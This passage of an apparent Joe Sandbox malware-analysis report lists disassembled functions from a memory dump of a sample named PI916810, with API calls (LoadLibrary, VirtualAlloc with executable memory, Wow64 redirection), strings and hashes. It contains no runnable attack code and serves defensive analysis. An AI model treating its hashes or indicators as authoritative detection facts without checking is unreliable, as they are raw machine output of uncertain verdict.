                                                                                                                                                                            • Opcode ID: 023053b2c257624816969610972a60ce27966bb940c07d5f80388b89bc62a895
                                                                                                                                                                            • Instruction ID: a89d66715cdf5ac95200205df81aedcddf028d55c69f90d7ff6e608a9ae60035
                                                                                                                                                                            • Opcode Fuzzy Hash: 023053b2c257624816969610972a60ce27966bb940c07d5f80388b89bc62a895
                                                                                                                                                                            • Instruction Fuzzy Hash: 45512721A09A019BCF21B725C94137F2F949B10750F208DBBE895863E6EE7C8CD5DB4E
                                                                                                                                                                            Function 0048023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #$+
                                                                                                                                                                            • API String ID: 0-2552117581
                                                                                                                                                                            • Opcode ID: 07a9bd032d2a026ee8d928463071bc74bcae8be2d7ade47a1446aaf552ee2923
                                                                                                                                                                            • Instruction ID: 7e1f782c00a52050efe15141f6c13e9f6d5032290f3c2b9fde131c69be3ef5d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 07a9bd032d2a026ee8d928463071bc74bcae8be2d7ade47a1446aaf552ee2923
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C5111741046458BDF25AF28C4887FEBBA8EF19310F14815AEC919B3A0D7389C46CB79
                                                                                                                                                                            Function 00473297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$_free
                                                                                                                                                                            • String ID: OaG
                                                                                                                                                                            • API String ID: 2620147621-282697018
                                                                                                                                                                            • Opcode ID: e060ba6d48dc4157d1489ff551f2c7f8a2df4dfd9e1c0ae5cdfec089a8b79e1b
                                                                                                                                                                            • Instruction ID: ef20a5314128c3a2184fddf0f0e17f7c001f68a2a6c5cce5525badae907dd33e
                                                                                                                                                                            • Opcode Fuzzy Hash: e060ba6d48dc4157d1489ff551f2c7f8a2df4dfd9e1c0ae5cdfec089a8b79e1b
                                                                                                                                                                            • Instruction Fuzzy Hash: EB514A716083419FDB24CF29C841BAFBBE5EF85314F04892EE98987361DB39D901DB96
                                                                                                                                                                            Function 004762F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$_memmove
                                                                                                                                                                            • String ID: ERCP
                                                                                                                                                                            • API String ID: 2532777613-1384759551
                                                                                                                                                                            • Opcode ID: 04ccfe8a11cedaed8430ec0eafca38ad749f7cd4cb5b8361c85ca0464b53b875
                                                                                                                                                                            • Instruction ID: d3629c24f59803d6865886fbfc1b8321ab8b0e5bed18ec354b8084b730a1e395
                                                                                                                                                                            • Opcode Fuzzy Hash: 04ccfe8a11cedaed8430ec0eafca38ad749f7cd4cb5b8361c85ca0464b53b875
                                                                                                                                                                            • Instruction Fuzzy Hash: 6751D0719007099BDB24CF65C8807EBBBF9EF08314F20856FE94ECA251E7789985CB58
                                                                                                                                                                            Function 004E7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004E76D0
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004E76E4
                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 004E7708
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                            • Opcode ID: 0e8f898a3de8b5993fd120ebb09bb5fa7c64b5403f8e427b37e2dae2396bc338
                                                                                                                                                                            • Instruction ID: 42aa40948be4850be560f6cf3d6e3f27548a1c14b53b8d1e203277f387fc8781
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e8f898a3de8b5993fd120ebb09bb5fa7c64b5403f8e427b37e2dae2396bc338
                                                                                                                                                                            • Instruction Fuzzy Hash: DE21D132500258BBDF11CF65CC82FEB3B69EF48728F110219FE156B2D0D6B5B8558BA4
                                                                                                                                                                            Function 004E6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004E6FAA
                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004E6FBA
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004E6FDF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                            • Opcode ID: d163e2eb0a4cd14ab16f0fe1bd9713004ad951fc7f29de7ef46d3b38f435da55
                                                                                                                                                                            • Instruction ID: f87246c1f31aa1c0021987eb202e4060d4f8f5ecb013fb9db7f35be3221cc3fa
                                                                                                                                                                            • Opcode Fuzzy Hash: d163e2eb0a4cd14ab16f0fe1bd9713004ad951fc7f29de7ef46d3b38f435da55
                                                                                                                                                                            • Instruction Fuzzy Hash: C02137326001487FDF118F55DC84FBB3B6AEF997A4F028025F9009B290C675AC11C7A4
                                                                                                                                                                            Function 004E797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004E79E1
                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004E79F6
                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004E7A03
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                            • Opcode ID: db672d64053f3013658efc21836da2a5277096744b90e732218fe350af1503e4
                                                                                                                                                                            • Instruction ID: dad7a22ce4290ef248797f7f29b9a53fae6bf2f7997850200915d4a18a6e3e58
                                                                                                                                                                            • Opcode Fuzzy Hash: db672d64053f3013658efc21836da2a5277096744b90e732218fe350af1503e4
                                                                                                                                                                            • Instruction Fuzzy Hash: F5112772240248BBEF109F71CC05FDB37A9EF89765F01052AF640A6191D2759851DB64
                                                                                                                                                                            Function 00464C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00464C2E), ref: 00464CA3
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00464CB5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-192647395
                                                                                                                                                                            • Opcode ID: 65afdbd3538ad9d25f1b0b0bb2112d775baf46cf21b73b67cbd0eab769988d2b
                                                                                                                                                                            • Instruction ID: 8c5be96b58369dca8059633c716b0d091335f8b5f9a2d3c270d1ea944c04275f
                                                                                                                                                                            • Opcode Fuzzy Hash: 65afdbd3538ad9d25f1b0b0bb2112d775baf46cf21b73b67cbd0eab769988d2b
                                                                                                                                                                            • Instruction Fuzzy Hash: ADD0C230500727CFCB208F31C948602B2D5AF40741B21C83F9881CA250E678D884C618
                                                                                                                                                                            Function 00464D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00464D2E,?,00464F4F,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464D6F
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00464D81
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-3689287502
                                                                                                                                                                            • Opcode ID: 04997f603bdc33b7b21a42a19a5e60ce8605ac917066f05c32fe7c67f25027b7
                                                                                                                                                                            • Instruction ID: 2ce29cca64eaaa7db7315b08db592a9df6995f32e48e251c94ba5e7fb53c4568
                                                                                                                                                                            • Opcode Fuzzy Hash: 04997f603bdc33b7b21a42a19a5e60ce8605ac917066f05c32fe7c67f25027b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 53D0C730900753CFDB208F31C848202BAE8BF083A2B20C93E9482CA290E678D880CA18
                                                                                                                                                                            Function 00464D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00464CE1,?), ref: 00464DA2
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00464DB4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-1355242751
                                                                                                                                                                            • Opcode ID: b82ded3eaed6affac03bc95eebd2f4a3c239721ecd11d3f175977acae516577f
                                                                                                                                                                            • Instruction ID: da0e260a17bf1a879eccdd4dd48ca18219b978e2f7a35cdba5b22487f7edcf4d
                                                                                                                                                                            • Opcode Fuzzy Hash: b82ded3eaed6affac03bc95eebd2f4a3c239721ecd11d3f175977acae516577f
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D0C770900713CFDB208F31C848A86B6E4AF08341B10C83ED8C2CA250E778E880CA18
                                                                                                                                                                            Function 004E1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,004E12C1), ref: 004E1080
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004E1092
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                            • API String ID: 2574300362-4033151799
                                                                                                                                                                            • Opcode ID: f84ef9d7e64c0e75eee784603dce8e779ae71954b200550c95e3626ec0068127
                                                                                                                                                                            • Instruction ID: 9f3ea3ae231da1f580545cdb64f5d1eb76c7091af01db71c74e090b86b8aa0ed
                                                                                                                                                                            • Opcode Fuzzy Hash: f84ef9d7e64c0e75eee784603dce8e779ae71954b200550c95e3626ec0068127
                                                                                                                                                                            • Instruction Fuzzy Hash: 9BD0C230440752CFE7204F31C858957B6E4BF44352B008D3EA4D5CA660D7B4C8C4C600
                                                                                                                                                                            Function 004D93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,004D9009,?,004EF910), ref: 004D9403
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004D9415
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-199464113
                                                                                                                                                                            • Opcode ID: dec2eb343c78d832b23aacc33beb240dc7890ce5390d4357cfbc251fcb800c89
                                                                                                                                                                            • Instruction ID: 5eda7b0c38c5db462060d04006c64da6dcfd2db5d27427e24b61010f9501e00c
                                                                                                                                                                            • Opcode Fuzzy Hash: dec2eb343c78d832b23aacc33beb240dc7890ce5390d4357cfbc251fcb800c89
                                                                                                                                                                            • Instruction Fuzzy Hash: C9D0C730604727CFD7208F31C948203B6E4AF00342B10C83FA482EAA52E778CC84CA54
                                                                                                                                                                            Function 004B76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 831fcc731e9eecf636a32ae7898678acf793a237c17c453998403f85b0223d8f
                                                                                                                                                                            • Instruction ID: 1d3a90f20c4f36e8de5732afd491739d329349a8656a77bce7f0ba2a8c1627a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 831fcc731e9eecf636a32ae7898678acf793a237c17c453998403f85b0223d8f
                                                                                                                                                                            • Instruction Fuzzy Hash: E4C19074A04216EFDB14DFA4C884EAEB7B5FF88710B10859AE805EB351D734EE41CBA4
                                                                                                                                                                            Function 004DE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 004DE3D2
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 004DE415
                                                                                                                                                                              • Part of subcall function 004DDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004DDAD9
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 004DE615
                                                                                                                                                                            • _memmove.LIBCMT ref: 004DE628
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3659485706-0
                                                                                                                                                                            • Opcode ID: adedbb9a24a54d1f7bb8e9f94d21699a2fd2b38bbf59f8ddd9387c55b9bcd234
                                                                                                                                                                            • Instruction ID: 71d53edbb8f8fa5fbdb4f14f624dea5d12a0f2dda1b078a4374db83b07f3f05f
                                                                                                                                                                            • Opcode Fuzzy Hash: adedbb9a24a54d1f7bb8e9f94d21699a2fd2b38bbf59f8ddd9387c55b9bcd234
                                                                                                                                                                            • Instruction Fuzzy Hash: B7C179716083019FC714EF29C49096ABBE4FF89318F04896FF9999B351E774E906CB86
                                                                                                                                                                            Function 004D83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 004D83D8
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004D83E3
                                                                                                                                                                              • Part of subcall function 004BDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004BDAC5
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004D83EE
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004D86BF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 780911581-0
                                                                                                                                                                            • Opcode ID: 0db9052acbbe44f8bc774348af4057050f8843ded58c227f1a7ed924a89c7528
                                                                                                                                                                            • Instruction ID: 37d2a4d43b9e2a82a1d1bc099970d5c1f22077d222461f22cec44e03d56cfb03
                                                                                                                                                                            • Opcode Fuzzy Hash: 0db9052acbbe44f8bc774348af4057050f8843ded58c227f1a7ed924a89c7528
                                                                                                                                                                            • Instruction Fuzzy Hash: 36A13D752047019FCB10DF15C4A1B2AB7E4BF88328F18445EF99A9B3A1DB78ED05CB5A
                                                                                                                                                                            Function 004B6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
